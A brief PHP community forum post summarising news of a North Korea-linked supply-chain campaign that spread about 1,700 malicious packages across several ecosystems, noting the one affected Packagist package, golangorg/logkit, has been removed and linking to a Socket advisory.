unknown

The North Korea-linked Contagious Interview campaign has expanded to five open-source ecosystems — npm, PyPI, Go, Rust, and PHP (Packagist) — publishing over 1,700 malicious packages since January 2025. These packages impersonate legitimate developer tooling and act as malware loaders that fetch second-stage payloads with infostealer and RAT capabilities, targeting browser data, password managers, and crypto wallets. Notably, malicious code is not triggered at install time but embedded within seemingly legitimate functions to evade detection. A separate but related campaign by UNC1069 (overlapping with BlueNoroff/Sapphire Sleet) poisoned the Axios npm package and uses social engineering via Telegram, LinkedIn, and Slack with fake Zoom/Teams meeting links to deliver implants that remain dormant post-compromise to maximize operational window.

N. Korean Hackers Spread 1,700 Malicious Packages Across npm, PyPI, Go, Rust

Welcome to PHP Dev, a dedicated space for sharing knowledge about PHP and its ecosystem (only PHP directly related).
Help us find good articles and blogposts and provide links. Upvote or downvote, after reading, it's essential

PHP Dev

N. Korean Hackers inject one PHP component: golangorg/logkit

N. Korean Hackers inject one PHP component: golangorg/logkit

golangorg/logkit is the only PHP package that was infected, and it is already not available on Packagist.
More there too:
<a href="https://socket.dev/supply-chain-attacks/north-korea-s-contagious-interview-campaign" target="_blank" rel="noopener nofollow">https://socket.dev/supply-chain-attacks/north-korea-s-contagious-interview-campaign</a>